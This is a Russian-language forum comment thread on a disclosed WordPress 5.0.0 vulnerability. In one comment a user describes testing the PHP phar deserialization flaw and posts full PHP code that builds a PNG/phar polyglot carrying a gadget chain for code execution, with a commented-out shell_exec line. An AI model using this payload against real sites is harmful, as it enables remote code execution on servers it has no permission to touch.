- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 14:07 , 20-Фев-19 (1) –5 [V]
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 14:17 , 20-Фев-19 (2) +2
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 14:26 , 20-Фев-19 (5) +10 [^]
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним Анонимович, 15:45 , 20-Фев-19 (15)
- Раскрыты детали уязвимости в WordPress 5.0.0, пп, 23:36 , 20-Фев-19 (39)
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 14:19 , 20-Фев-19 (3)
- Раскрыты детали уязвимости в WordPress 5.0.0, Анончик999999, 14:52 , 20-Фев-19 (8)
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 15:20 , 20-Фев-19 (10) +3
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним3, 15:26 , 20-Фев-19 (11) –2
- Раскрыты детали уязвимости в WordPress 5.0.0, YetAnotherOnanym, 16:47 , 20-Фев-19 (21)
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноном, 17:14 , 20-Фев-19 (25)
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 17:49 , 20-Фев-19 (27) +1
- Раскрыты детали уязвимости в WordPress 5.0.0, th3m3, 18:00 , 20-Фев-19 (28) +2
- Раскрыты детали уязвимости в WordPress 5.0.0, robot228, 22:35 , 20-Фев-19 (36) +2
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 00:30 , 21-Фев-19 (41)
- Раскрыты детали уязвимости в WordPress 5.0.0, трурль, 09:46 , 21-Фев-19 (50)
Кстати, граждане похапехейтеры. Подскажите, как настроить php, чтобы он стал, наконец, уязвляться этой самой phar-уязвимостью. Может, модуль какой надо установить, или что. У меня не хочет исполнять код через file_exists, хоть ты тресни. Дефолтная установка php-fpm из реп убунтей 16.04 и 18.04, и древний денвер на виртуалке тоже не хочет. Ни через http-сервер, ни через cli.
- Раскрыты детали уязвимости в WordPress 5.0.0, domov0y, 10:31 , 21-Фев-19 (51)
- Раскрыты детали уязвимости в WordPress 5.0.0, нах, 10:59 , 21-Фев-19 (57)
- Раскрыты детали уязвимости в WordPress 5.0.0, трурль, 15:35 , 21-Фев-19 (70)
> 5. скормить файл не патченой версии пыха старше чем 5.3.С древним денвером ясно,там 5.3. > ибо выполняться должно > либо file_exists("phar://путь/к/phar.файлу.не.обязательно.с.расширением.phar....") > либо file_exists("phar://путь/к/phar.файлу.не.обязательно.с.расширением.phar..../not_found.html") > А вот > file_exists("путь/к/phar.файлу.не.обязательно.с.расширением.phar....") > или > file_exists("путь/к/phar.файлу.не.обязательно.с.расширением.phar..../not_found.html"). > вернет true или false вообще не заглядывая внутрь архива А, вон чего я упустил. Теперь на cli наблюдается некое шевеление, но не то, что предполагалось: >PHP Warning: Class __PHP_Incomplete_Class has no unserializer in /home/onotole/1/phar_test/phar_probe.php on line 8 (php7.2.15-0ubuntu0.18.04.1) А вот на впс-ке с центосью (php5.4.16): >Warning: file_exists(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /var/www/httpdocs/phar_test/teest.php on line 16 >Warning: Class __PHP_Incomplete_Class has no unserializer in /var/www/httpdocs/phar_test/teest.php on line 16) Что-то все это напоминает вирусы под линукс: половина не собирается, треть не работает, остальные затрахаешься настраивать. Но ухо востро держать следует, спасибо за подсказку. --------------------------------------- Картинку со вшитым объектом делал так: class Requests_Utility_FilteredIterator extends ArrayIterator{ protected $callback; public function __construct(){ $this->callback = 'assert'; } } class WC_Log_Handler_File{ protected $handles; public function __construct(){ $this->handles = new Requests_Utility_FilteredIterator; // $this->handles[] = 'die(shell_exec("ls -la"));'; $this->handles[] = 'die("You are hacked!");'; } } function img(){ ob_start(); imagepng(imagecreatetruecolor(200, 200)); return ob_get_clean(); } $n = 'image.phar'; $p = new Phar($n); $p->setStub(img().'__HALT_COMPILER();'); $p->setMetadata(new WC_Log_Handler_File); $p['x'] = ''; rename($n, $n.'.png'); (ссылку потерял, вроде бы от чувака, который первым этот эксплойт в картинкой предложил)
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 09:38 , 23-Фев-19 (82)
- Раскрыты детали уязвимости в WordPress 5.0.0, Аноним, 20:51 , 27-Фев-19 (83)
|